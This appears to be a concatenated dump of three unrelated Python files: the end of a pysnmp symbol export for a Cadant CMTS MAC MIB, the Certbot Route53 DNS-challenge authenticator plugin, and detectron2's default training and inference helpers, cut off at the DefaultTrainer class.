cadMacResetCMMacAddress=cadMacResetCMMacAddress, cadQosServiceClassCmControlTable=cadQosServiceClassCmControlTable, cadCmtsCmVendorTable=cadCmtsCmVendorTable, cadIfCmtsCmCountsTable=cadIfCmtsCmCountsTable, cadSubMgtCpeControlEntry=cadSubMgtCpeControlEntry, cadCpeHostAuthorizationTable=cadCpeHostAuthorizationTable, cadEnforceRuleStatus=cadEnforceRuleStatus, cadCmtsCmStatusNumOther=cadCmtsCmStatusNumOther, cadTpFdbTable=cadTpFdbTable, cadMacClearDenyCountMacAddr=cadMacClearDenyCountMacAddr, cadCmtsCmStatusMacChNumDhcpv6Complete=cadCmtsCmStatusMacChNumDhcpv6Complete, cadTpFdbStatus=cadTpFdbStatus, cadIfCmtsCmStatusValue=cadIfCmtsCmStatusValue, cadIfCmtsCmOfdmStatusMacAddress=cadIfCmtsCmOfdmStatusMacAddress, cadIfCmtsCmStatusInetIpAddress=cadIfCmtsCmStatusInetIpAddress, cadIfCmtsServiceEntry=cadIfCmtsServiceEntry, cadCmtsCmStatusMacNumRfMuteAll=cadCmtsCmStatusMacNumRfMuteAll, cadQosServiceClassControl=cadQosServiceClassControl, cadSubMgtMtaFilterDownstream=cadSubMgtMtaFilterDownstream, cadCmtsCmStatusMacNumDhcpv4Complete=cadCmtsCmStatusMacNumDhcpv4Complete, cadEnforceRuleCountsEntry=cadEnforceRuleCountsEntry, cadIfCmtsInetIpMac=cadIfCmtsInetIpMac, cadMacClearDenyCounts=cadMacClearDenyCounts, cadIfCmtsServiceAdminStatus=cadIfCmtsServiceAdminStatus, cadCmtsCmStatusNumRangingAborted=cadCmtsCmStatusNumRangingAborted, cadCpeHostAuthRowStatus=cadCpeHostAuthRowStatus, cadCmtsCmStatusMacNumInitRanging=cadCmtsCmStatusMacNumInitRanging, cadIfCmtsCmStatusNumber=cadIfCmtsCmStatusNumber, cadQosServiceFlowSegHdr=cadQosServiceFlowSegHdr, cadEnforceRuleEntry=cadEnforceRuleEntry, cadQosServiceClassControlTable=cadQosServiceClassControlTable, cadEnforceRuleAvgHistoryDuration=cadEnforceRuleAvgHistoryDuration, cadIf3CmtsCmRegStatusRcsId=cadIf3CmtsCmRegStatusRcsId, cadIfCmtsMacInetIpAddrType=cadIfCmtsMacInetIpAddrType, cadIf3CmtsCmRegStatusEnergyMgtEnabled=cadIf3CmtsCmRegStatusEnergyMgtEnabled, cadIfCmtsCmStatusDocsisVersion=cadIfCmtsCmStatusDocsisVersion, cadIfCmtsCmCountsSignalNoise=cadIfCmtsCmCountsSignalNoise, cadCmtsCmStatusMacNumProvFlaps=cadCmtsCmStatusMacNumProvFlaps, cadArpNetAddress=cadArpNetAddress, cadIfCmtsCmStatusConfigFilename=cadIfCmtsCmStatusConfigFilename, cadSubMgtCpeControlTable=cadSubMgtCpeControlTable, cadCpeHostAuthCpeIpAddress=cadCpeHostAuthCpeIpAddress, cadIfCmtsCmCountsUpChIfIndex=cadIfCmtsCmCountsUpChIfIndex, cadIfCmtsCmCountsCorrecteds=cadIfCmtsCmCountsCorrecteds, cadCmDenyAttempts=cadCmDenyAttempts, cadCpeHostAuthorizationEntry=cadCpeHostAuthorizationEntry, cadCmtsCmStatusMacChNumBpiInit=cadCmtsCmStatusMacChNumBpiInit, cadSubMgtCmFilterTable=cadSubMgtCmFilterTable, cadIfCmtsCmCountsEntry=cadIfCmtsCmCountsEntry, cadChannelToCmEntry=cadChannelToCmEntry, cadArpMacAddress=cadArpMacAddress, cadCmtsCmStatusMacNumStartRegistration=cadCmtsCmStatusMacNumStartRegistration, cadIfCmtsMacToInetIpTable=cadIfCmtsMacToInetIpTable, cadIfCmtsCmStatusProvFlaps=cadIfCmtsCmStatusProvFlaps, cadCmtsCmVendorEntry=cadCmtsCmVendorEntry, cadIfCmtsCmOfdmStatusTable=cadIfCmtsCmOfdmStatusTable, cadMacMib=cadMacMib, cadIfCmtsPtrToMacTable=cadIfCmtsPtrToMacTable, cadCmtsCmStatusMacChNumStartRegistration=cadCmtsCmStatusMacChNumStartRegistration, cadCmtsCmStatusMacChNumRegistrationComplete=cadCmtsCmStatusMacChNumRegistrationComplete, cadIfCmtsCmStatusBpiEnabled=cadIfCmtsCmStatusBpiEnabled, cadQosServiceClassCmControlSendDscMacAddr=cadQosServiceClassCmControlSendDscMacAddr, cadCmtsCmStatusMacNumDhcpv6Complete=cadCmtsCmStatusMacNumDhcpv6Complete, cadEnforceRulePenaltyDuration=cadEnforceRulePenaltyDuration, cadIfCmtsMacToInetIpAddr=cadIfCmtsMacToInetIpAddr, cadIf3CmtsCmRegStatusTcsId=cadIf3CmtsCmRegStatusTcsId, cadEnforceRule=cadEnforceRule, cadSubmgtFilterGrpDescription=cadSubmgtFilterGrpDescription, cadCmtsCmStatusNumOperational=cadCmtsCmStatusNumOperational, cadIfCmtsCmCountsTxPower=cadIfCmtsCmCountsTxPower, cadCmDenyRecentTime=cadCmDenyRecentTime, cadIfQosProfileLookupRefCount=cadIfQosProfileLookupRefCount, cadIfCmtsCmStatusUsPenalties=cadIfCmtsCmStatusUsPenalties, cadIf3CmtsCmRegStatusMdCmSgId=cadIf3CmtsCmRegStatusMdCmSgId, cadSubMgtCpeControlReset=cadSubMgtCpeControlReset, cadIfCmtsCmStatusUpChannelIfIndex=cadIfCmtsCmStatusUpChannelIfIndex, cadQosServiceClassPeakTrafficRate=cadQosServiceClassPeakTrafficRate, cadIfCmtsCmStatusLastUsPenaltyStart=cadIfCmtsCmStatusLastUsPenaltyStart, cadEnforceRuleCountsPenalties=cadEnforceRuleCountsPenalties, cadCmtsCmStatusMacChNumInitRanging=cadCmtsCmStatusMacChNumInitRanging, cadQosServiceFlowSidClusterChIfIndex=cadQosServiceFlowSidClusterChIfIndex, cadEnforceRuleCountsTable=cadEnforceRuleCountsTable, cadIfCmtsCmStatusInitRangTime=cadIfCmtsCmStatusInitRangTime, cadIfCmtsCmOfdmStatusDsHighFreq=cadIfCmtsCmOfdmStatusDsHighFreq, cadQosServiceClassCmControlEntry=cadQosServiceClassCmControlEntry, cadQosCmtsMacToSrvFlowEntry=cadQosCmtsMacToSrvFlowEntry, cadCmtsCmStatusMacChSummaryTable=cadCmtsCmStatusMacChSummaryTable, cadIfCmtsCmStatusDocsCapability=cadIfCmtsCmStatusDocsCapability, cadIfQosProfMaxUpBandwidth=cadIfQosProfMaxUpBandwidth, cadMacClearFlapCounts=cadMacClearFlapCounts, cadCmtsCmStatusMacChNumRangingAborted=cadCmtsCmStatusMacChNumRangingAborted, cadIfCmtsCmStatusModemType=cadIfCmtsCmStatusModemType, cadCmtsCmStatusNumAccessDenied=cadCmtsCmStatusNumAccessDenied, cadIfQosProfMaxDownBandwidth=cadIfQosProfMaxDownBandwidth, cadCmtsCmStatusMacNumStartDhcpv4=cadCmtsCmStatusMacNumStartDhcpv4, cadMacClearFlapCountsByIfIndex=cadMacClearFlapCountsByIfIndex, cadIfCmtsCmOfdmProfStatus=cadIfCmtsCmOfdmProfStatus, cadQosServiceFlowSidClusterUcid=cadQosServiceFlowSidClusterUcid, cadSubMgtCpeFilterDownstream=cadSubMgtCpeFilterDownstream, cadArpIfIndex=cadArpIfIndex, cadQosServiceFlowSidClusterTable=cadQosServiceFlowSidClusterTable, cadIfCmtsCmStatusEntry=cadIfCmtsCmStatusEntry, cadIfCmtsCmOfdmStatusOkOfdmaMod=cadIfCmtsCmOfdmStatusOkOfdmaMod, cadQosCmtsIfIndex=cadQosCmtsIfIndex, cadIfCmtsCmOfdmProfTable=cadIfCmtsCmOfdmProfTable, cadArpL3IfIndex=cadArpL3IfIndex, cadCmtsCmVendorRowStatus=cadCmtsCmVendorRowStatus, cadIfCmtsCmCountsRangeReqOpportunities=cadIfCmtsCmCountsRangeReqOpportunities, cadCpeHostAuthCmMacAddress=cadCpeHostAuthCmMacAddress, cadEnforceRuleSamplingInterval=cadEnforceRuleSamplingInterval, cadSubMgtCpeControlMaxCpeIpv4=cadSubMgtCpeControlMaxCpeIpv4, cadIf3CmtsCmRegStatusRccStatusId=cadIf3CmtsCmRegStatusRccStatusId, cadIfQosProfileLookupIndex=cadIfQosProfileLookupIndex, cadArpState=cadArpState, cadChannelToCmPtr=cadChannelToCmPtr, cadCmtsCmStatusMacChNumForwardingDisabled=cadCmtsCmStatusMacChNumForwardingDisabled, cadIf3CmtsCmRegStatusRcpId=cadIf3CmtsCmRegStatusRcpId, cadIfCmtsCmCountsPowerAdjExceedsThreshold=cadIfCmtsCmCountsPowerAdjExceedsThreshold, cadSubMgtCpeControlLastReset=cadSubMgtCpeControlLastReset, cadIfCmtsCmStatusRangFlaps=cadIfCmtsCmStatusRangFlaps, cadIfCmtsCmStatusDownChannelIfIndex=cadIfCmtsCmStatusDownChannelIfIndex, cadCmDenyTable=cadCmDenyTable, cadIfCmtsCmStatusInetIpAddrType=cadIfCmtsCmStatusInetIpAddrType, cadEnforceRuleReferenceSCN=cadEnforceRuleReferenceSCN, cadMacControl=cadMacControl, cadCmtsCmStatusNumProvFlaps=cadCmtsCmStatusNumProvFlaps, cadMacClearPenaltyCounts=cadMacClearPenaltyCounts, cadCmtsCmStatusMacChNumDhcpv4Complete=cadCmtsCmStatusMacChNumDhcpv4Complete, cadCmtsCmStatusMacNumStartCfgFileDownload=cadCmtsCmStatusMacNumStartCfgFileDownload, cadIfCmtsCmStatusInsertionFlaps=cadIfCmtsCmStatusInsertionFlaps, cadEnforceRuleTable=cadEnforceRuleTable, cadIfQosProfMaxTxBurst=cadIfQosProfMaxTxBurst, cadCmDenyRecentIfIndex=cadCmDenyRecentIfIndex, cadIfHVCmtsCmStatusInitRangTime=cadIfHVCmtsCmStatusInitRangTime, cadCmtsCmStatusMacNumRangFlaps=cadCmtsCmStatusMacNumRangFlaps, cadChannelToCmTable=cadChannelToCmTable, cadIfCmtsServiceTable=cadIfCmtsServiceTable, cadSubMgtCmFilterEntry=cadSubMgtCmFilterEntry, cadIfCmtsCmOfdmStatusEntry=cadIfCmtsCmOfdmStatusEntry, cadSubMgtStbFilterUpstream=cadSubMgtStbFilterUpstream, cadIfCmtsServiceId=cadIfCmtsServiceId, cadSubMgtCpeIpIndex=cadSubMgtCpeIpIndex, cadQosServiceClassEntry=cadQosServiceClassEntry, cadCmtsCmStatusMacNumOperational=cadCmtsCmStatusMacNumOperational, cadQosServiceFlowSidClusterEntry=cadQosServiceFlowSidClusterEntry, cadIfCmtsMacCmMacAddr=cadIfCmtsMacCmMacAddr, cadCmtsCmStatusMacNumForwardingDisabled=cadCmtsCmStatusMacNumForwardingDisabled, cadIfCmtsCmStatusLastDsPenaltyStart=cadIfCmtsCmStatusLastDsPenaltyStart, cadIfCmtsCmStatusDocsProvisioned=cadIfCmtsCmStatusDocsProvisioned, cadIfCmtsCmStatusRxAcPowerLost=cadIfCmtsCmStatusRxAcPowerLost, cadArpTable=cadArpTable, cadIfCmtsServiceQosProfile=cadIfCmtsServiceQosProfile, cadCmtsCmStatusMacChNumProvFlaps=cadCmtsCmStatusMacChNumProvFlaps, cadSubMgtCpeControlMaxCpeIpv6Addresses=cadSubMgtCpeControlMaxCpeIpv6Addresses, cadQosServiceClassControlSendDscLastUpdated=cadQosServiceClassControlSendDscLastUpdated, cadCmtsCmStatusMacChNumOther=cadCmtsCmStatusMacChNumOther, cadIfCmtsCmStatusDsPenalties=cadIfCmtsCmStatusDsPenalties, cadSubmgtFilterGrpRowStatus=cadSubmgtFilterGrpRowStatus, cadIfCmtsServiceCreateTime=cadIfCmtsServiceCreateTime, cadCmtsCmStatusMacNumRangingComplete=cadCmtsCmStatusMacNumRangingComplete, cadCmtsCmStatusNumRangFlaps=cadCmtsCmStatusNumRangFlaps, cadIfCmtsCmMac=cadIfCmtsCmMac, cadCmtsCmStatusNumActive=cadCmtsCmStatusNumActive, cadIfCmtsCmOfdmProfIfIndex=cadIfCmtsCmOfdmProfIfIndex, cadTpFdbAddress=cadTpFdbAddress, cadQosCmtsServiceFlowId=cadQosCmtsServiceFlowId, cadQosServiceClassTable=cadQosServiceClassTable, cadCmtsCmStatusMacChNumTotal=cadCmtsCmStatusMacChNumTotal, cadCmtsCmStatusMacNumRangingAborted=cadCmtsCmStatusMacNumRangingAborted, cadCmDenyMacAddress=cadCmDenyMacAddress, cadCmtsCmStatusSummaryTable=cadCmtsCmStatusSummaryTable, cadCmtsCmStatusMacChNumStartCfgFileDownload=cadCmtsCmStatusMacChNumStartCfgFileDownload, cadIfCmtsInetIpToCmMacTable=cadIfCmtsInetIpToCmMacTable)
mibBuilder.exportSymbols("CADANT-CMTS-MAC-MIB", cadIfCmtsCmStatusCmPtr=cadIfCmtsCmStatusCmPtr, cadCmtsCmStatusMacNumRegistrationComplete=cadCmtsCmStatusMacNumRegistrationComplete, cadCmDenyStatusEntry=cadCmDenyStatusEntry, cadSubMgtSubFilterUpstream=cadSubMgtSubFilterUpstream, cadIfCmtsCmStatusPreFlapStatus=cadIfCmtsCmStatusPreFlapStatus, cadCmtsCmStatusMacChSummaryEntry=cadCmtsCmStatusMacChSummaryEntry, cadCmtsCmStatusMacChNumCfgFileDownloadComplete=cadCmtsCmStatusMacChNumCfgFileDownloadComplete, cadIf3CmtsCmRegStatusIPv6Addr=cadIf3CmtsCmRegStatusIPv6Addr, cadIfCmtsCmStatusLastUsPenaltyDuration=cadIfCmtsCmStatusLastUsPenaltyDuration, cadSubMgtCpeIpLearned=cadSubMgtCpeIpLearned, cadCmtsCmStatusNumRegisteredBpiInitializing=cadCmtsCmStatusNumRegisteredBpiInitializing, cadCmtsCmStatusMacNumTotal=cadCmtsCmStatusMacNumTotal, cadIfCmtsCmCountsEqualizationData=cadIfCmtsCmCountsEqualizationData, cadSubMgtCpeControlLearnable=cadSubMgtCpeControlLearnable, cadCmtsCmVendorName=cadCmtsCmVendorName, cadCmtsCmStatusMacSummaryTable=cadCmtsCmStatusMacSummaryTable, cadIfQosProfileLookupEntry=cadIfQosProfileLookupEntry, cadCmtsCmStatusNumRangingComplete=cadCmtsCmStatusNumRangingComplete, cadIfCmtsCmCountsUnerroreds=cadIfCmtsCmCountsUnerroreds, cadMacRecalculateCmSummaryIfIndex=cadMacRecalculateCmSummaryIfIndex, cadSubmgtFilterGrpId=cadSubmgtFilterGrpId, cadIfCmtsCmStatusTable=cadIfCmtsCmStatusTable, cadIfQosProfPriority=cadIfQosProfPriority, cadIfQosProfGuarUpBandwidth=cadIfQosProfGuarUpBandwidth, cadMacClearPenaltyCountMacAddr=cadMacClearPenaltyCountMacAddr, cadCmtsCmStatusMacChNumRegFlaps=cadCmtsCmStatusMacChNumRegFlaps, cadIfCmtsMacToIpEntry=cadIfCmtsMacToIpEntry, cadSubMgtMtaFilterUpstream=cadSubMgtMtaFilterUpstream, cadSubMgtSubFilterDownstream=cadSubMgtSubFilterDownstream, cadIfCmtsCmStatusLastFlapTime=cadIfCmtsCmStatusLastFlapTime, cadCmtsCmStatusMacChNumRangFlaps=cadCmtsCmStatusMacChNumRangFlaps, cadSubMgtCpeIpAddr=cadSubMgtCpeIpAddr, cadArpAddressType=cadArpAddressType, cadSubMgtPsFilterUpstream=cadSubMgtPsFilterUpstream, CadIfCmtsCmStatusType=CadIfCmtsCmStatusType, cadIfHVCmtsCmStatusLastFlapTime=cadIfHVCmtsCmStatusLastFlapTime, cadIfCmtsCmStatusRegFlaps=cadIfCmtsCmStatusRegFlaps, cadIf3CmtsCmRegStatusServiceType=cadIf3CmtsCmRegStatusServiceType, cadEnforceRuleEnforceSCN=cadEnforceRuleEnforceSCN, cadSubMgtCpeCpeType=cadSubMgtCpeCpeType, cadQosServiceClassControlSendDsc=cadQosServiceClassControlSendDsc, cadIfCmtsMacAddr=cadIfCmtsMacAddr, cadIfCmtsMacInetIpAddr=cadIfCmtsMacInetIpAddr, cadArpEntry=cadArpEntry, cadCpeHostAuthCpeMacAddress=cadCpeHostAuthCpeMacAddress, cadTpFdbIfIndex=cadTpFdbIfIndex, cadMacClearPenaltyCountsByIfIndex=cadMacClearPenaltyCountsByIfIndex, cadIfCmtsCmStatusMacAddress=cadIfCmtsCmStatusMacAddress, cadTpFdbEntry=cadTpFdbEntry, cadSubMgtCpeFilterUpstream=cadSubMgtCpeFilterUpstream, cadIf3CmtsCmRegStatusLastRegTime=cadIf3CmtsCmRegStatusLastRegTime, cadEnforceRuleCreateTime=cadEnforceRuleCreateTime, cadQosCmtsCmMac=cadQosCmtsCmMac, cadCmtsCmVendorOUI=cadCmtsCmVendorOUI)
|
py | 7dfaceb327eafad33f9f728ac48e51f12ef9dd25 | """Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
"""Route53 Authenticator
This authenticator solves a DNS01 challenge by uploading the answer to AWS
Route53.
"""
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
@classmethod
def add_parser_arguments(cls, add): # pylint: disable=arguments-differ
super(Authenticator, cls).add_parser_arguments(add)
add('base-domain', default=None, help='Base domain containing the DNS TXT records, defaults to none.')
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_name, validation): # pylint: disable=missing-docstring
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
self._domain_to_update(achall.validation_domain_name(achall.domain)),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _domain_to_update(self, domain):
if self.conf('base-domain'):
return domain + '.' + self.conf('base-domain') + '.'
return domain
def _cleanup(self, domain, validation_name, validation):
try:
self._change_txt_record("DELETE", self._domain_to_update(validation_name), validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
"""Find the zone id responsible a given FQDN.
That is, the id for the zone whose name is the longest parent of the
domain.
"""
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
# Order the zones that are suffixes for our desired to domain by
# length, this puts them in an order like:
# ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
# And then we choose the first one, which will be the most specific.
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
# Remove the record being deleted from the list of tracked records
rrecords.remove(challenge)
if rrecords:
# Need to update instead, as we're not deleting the rrset
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
"""Wait for a change to be propagated to all Route53 DNS servers.
https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
"""
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
|
py | 7dfacec45b38859266490ae62f3e040b06ad67a3 | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
This file contains components with some default boilerplate logic user may need
in training / testing. They will not work for everyone, but many users may find them useful.
The behavior of functions/classes in this file is subject to change,
since they are meant to represent the "common default behavior" people need in their projects.
"""
import argparse
import logging
import os
import sys
import weakref
from collections import OrderedDict
from typing import Optional
import torch
from fvcore.nn.precise_bn import get_bn_modules
from omegaconf import OmegaConf
from torch.nn.parallel import DistributedDataParallel
import detectron2.data.transforms as T
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import CfgNode, LazyConfig
from detectron2.data import (
MetadataCatalog,
build_detection_test_loader,
build_detection_train_loader,
)
from detectron2.evaluation import (
DatasetEvaluator,
inference_on_dataset,
print_csv_format,
verify_results,
)
from detectron2.modeling import build_model
from detectron2.solver import build_lr_scheduler, build_optimizer
from detectron2.utils import comm
from detectron2.utils.collect_env import collect_env_info
from detectron2.utils.env import seed_all_rng
from detectron2.utils.events import CommonMetricPrinter, JSONWriter, TensorboardXWriter
from detectron2.utils.file_io import PathManager
from detectron2.utils.logger import setup_logger
from . import hooks
from .train_loop import AMPTrainer, SimpleTrainer, TrainerBase
__all__ = [
"create_ddp_model",
"default_argument_parser",
"default_setup",
"default_writers",
"DefaultPredictor",
"DefaultTrainer",
]
def create_ddp_model(model, *, fp16_compression=False, **kwargs):
"""
Create a DistributedDataParallel model if there are >1 processes.
Args:
model: a torch.nn.Module
fp16_compression: add fp16 compression hooks to the ddp object.
See more at https://pytorch.org/docs/stable/ddp_comm_hooks.html#torch.distributed.algorithms.ddp_comm_hooks.default_hooks.fp16_compress_hook
kwargs: other arguments of :module:`torch.nn.parallel.DistributedDataParallel`.
""" # noqa
if comm.get_world_size() == 1:
return model
if "device_ids" not in kwargs:
kwargs["device_ids"] = [comm.get_local_rank()]
ddp = DistributedDataParallel(model, **kwargs)
if fp16_compression:
from torch.distributed.algorithms.ddp_comm_hooks import default as comm_hooks
ddp.register_comm_hook(state=None, hook=comm_hooks.fp16_compress_hook)
return ddp
def default_argument_parser(epilog=None):
"""
Create a parser with some common arguments used by detectron2 users.
Args:
epilog (str): epilog passed to ArgumentParser describing the usage.
Returns:
argparse.ArgumentParser:
"""
parser = argparse.ArgumentParser(
epilog=epilog
or f"""
Examples:
Run on single machine:
$ {sys.argv[0]} --num-gpus 8 --config-file cfg.yaml
Change some config options:
$ {sys.argv[0]} --config-file cfg.yaml MODEL.WEIGHTS /path/to/weight.pth SOLVER.BASE_LR 0.001
Run on multiple machines:
(machine0)$ {sys.argv[0]} --machine-rank 0 --num-machines 2 --dist-url <URL> [--other-flags]
(machine1)$ {sys.argv[0]} --machine-rank 1 --num-machines 2 --dist-url <URL> [--other-flags]
""",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--config-file", default="", metavar="FILE", help="path to config file")
parser.add_argument(
"--resume",
action="store_true",
help="Whether to attempt to resume from the checkpoint directory. "
"See documentation of `DefaultTrainer.resume_or_load()` for what it means.",
)
parser.add_argument("--eval-only", action="store_true", help="perform evaluation only")
parser.add_argument("--num-gpus", type=int, default=1, help="number of gpus *per machine*")
parser.add_argument("--num-machines", type=int, default=1, help="total number of machines")
parser.add_argument(
"--machine-rank", type=int, default=0, help="the rank of this machine (unique per machine)"
)
# PyTorch still may leave orphan processes in multi-gpu training.
# Therefore we use a deterministic way to obtain port,
# so that users are aware of orphan processes by seeing the port occupied.
port = 2 ** 15 + 2 ** 14 + hash(os.getuid() if sys.platform != "win32" else 1) % 2 ** 14
parser.add_argument(
"--dist-url",
default="tcp://127.0.0.1:{}".format(port),
help="initialization URL for pytorch distributed backend. See "
"https://pytorch.org/docs/stable/distributed.html for details.",
)
parser.add_argument(
"opts",
help="""
Modify config options at the end of the command. For Yacs configs, use
space-separated "PATH.KEY VALUE" pairs.
For python-based LazyConfig, use "path.key=value".
""".strip(),
default=None,
nargs=argparse.REMAINDER,
)
return parser
def _try_get_key(cfg, *keys, default=None):
"""
Try select keys from cfg until the first key that exists. Otherwise return default.
"""
if isinstance(cfg, CfgNode):
cfg = OmegaConf.create(cfg.dump())
for k in keys:
# OmegaConf.select(default=) is supported only after omegaconf2.1,
# but some internal users still rely on 2.0
parts = k.split(".")
# https://github.com/omry/omegaconf/issues/674
for p in parts:
if p not in cfg:
break
cfg = OmegaConf.select(cfg, p)
else:
return cfg
return default
def _highlight(code, filename):
try:
import pygments
except ImportError:
return code
from pygments.lexers import Python3Lexer, YamlLexer
from pygments.formatters import Terminal256Formatter
lexer = Python3Lexer() if filename.endswith(".py") else YamlLexer()
code = pygments.highlight(code, lexer, Terminal256Formatter(style="monokai"))
return code
def default_setup(cfg, args):
"""
Perform some basic common setups at the beginning of a job, including:
1. Set up the detectron2 logger
2. Log basic information about environment, cmdline arguments, and config
3. Backup the config to the output directory
Args:
cfg (CfgNode or omegaconf.DictConfig): the full config to be used
args (argparse.NameSpace): the command line arguments to be logged
"""
output_dir = _try_get_key(cfg, "OUTPUT_DIR", "output_dir", "train.output_dir")
if comm.is_main_process() and output_dir:
PathManager.mkdirs(output_dir)
rank = comm.get_rank()
setup_logger(output_dir, distributed_rank=rank, name="fvcore")
logger = setup_logger(output_dir, distributed_rank=rank)
logger.info("Rank of current process: {}. World size: {}".format(rank, comm.get_world_size()))
logger.info("Environment info:\n" + collect_env_info())
logger.info("Command line arguments: " + str(args))
if hasattr(args, "config_file") and args.config_file != "":
logger.info(
"Contents of args.config_file={}:\n{}".format(
args.config_file,
_highlight(PathManager.open(args.config_file, "r").read(), args.config_file),
)
)
if comm.is_main_process() and output_dir:
# Note: some of our scripts may expect the existence of
# config.yaml in output directory
path = os.path.join(output_dir, "config.yaml")
if isinstance(cfg, CfgNode):
logger.info("Running with full config:\n{}".format(_highlight(cfg.dump(), ".yaml")))
with PathManager.open(path, "w") as f:
f.write(cfg.dump())
else:
LazyConfig.save(cfg, path)
logger.info("Full config saved to {}".format(path))
# make sure each worker has a different, yet deterministic seed if specified
seed = _try_get_key(cfg, "SEED", "train.seed", default=-1)
seed_all_rng(None if seed < 0 else seed + rank)
# cudnn benchmark has large overhead. It shouldn't be used considering the small size of
# typical validation set.
if not (hasattr(args, "eval_only") and args.eval_only):
torch.backends.cudnn.benchmark = _try_get_key(
cfg, "CUDNN_BENCHMARK", "train.cudnn_benchmark", default=False
)
def default_writers(output_dir: str, max_iter: Optional[int] = None):
"""
Build a list of :class:`EventWriter` to be used.
It now consists of a :class:`CommonMetricPrinter`,
:class:`TensorboardXWriter` and :class:`JSONWriter`.
Args:
output_dir: directory to store JSON metrics and tensorboard events
max_iter: the total number of iterations
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return [
# It may not always print what you want to see, since it prints "common" metrics only.
CommonMetricPrinter(max_iter),
JSONWriter(os.path.join(output_dir, "metrics.json")),
TensorboardXWriter(output_dir),
]
class DefaultPredictor:
"""
Create a simple end-to-end predictor with the given config that runs on
single device for a single input image.
Compared to using the model directly, this class does the following additions:
1. Load checkpoint from `cfg.MODEL.WEIGHTS`.
2. Always take BGR image as the input and apply conversion defined by `cfg.INPUT.FORMAT`.
3. Apply resizing defined by `cfg.INPUT.{MIN,MAX}_SIZE_TEST`.
4. Take one input image and produce a single output, instead of a batch.
This is meant for simple demo purposes, so it does the above steps automatically.
This is not meant for benchmarks or running complicated inference logic.
If you'd like to do anything more complicated, please refer to its source code as
examples to build and use the model manually.
Attributes:
metadata (Metadata): the metadata of the underlying dataset, obtained from
cfg.DATASETS.TEST.
Examples:
::
pred = DefaultPredictor(cfg)
inputs = cv2.imread("input.jpg")
outputs = pred(inputs)
"""
def __init__(self, cfg):
self.cfg = cfg.clone() # cfg can be modified by model
self.model = build_model(self.cfg)
self.model.eval()
if len(cfg.DATASETS.TEST):
self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
checkpointer = DetectionCheckpointer(self.model)
checkpointer.load(cfg.MODEL.WEIGHTS)
self.aug = T.ResizeShortestEdge(
[cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST
)
self.input_format = cfg.INPUT.FORMAT
assert self.input_format in ["RGB", "BGR"], self.input_format
def __call__(self, original_image):
"""
Args:
original_image (np.ndarray): an image of shape (H, W, C) (in BGR order).
Returns:
predictions (dict):
the output of the model for one image only.
See :doc:`/tutorials/models` for details about the format.
"""
with torch.no_grad(): # https://github.com/sphinx-doc/sphinx/issues/4258
# Apply pre-processing to image.
if self.input_format == "RGB":
# whether the model expects BGR inputs or RGB
original_image = original_image[:, :, ::-1]
height, width = original_image.shape[:2]
image = self.aug.get_transform(original_image).apply_image(original_image)
image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1))
inputs = {"image": image, "height": height, "width": width}
predictions = self.model([inputs])[0]
return predictions
class DefaultTrainer(TrainerBase):
"""
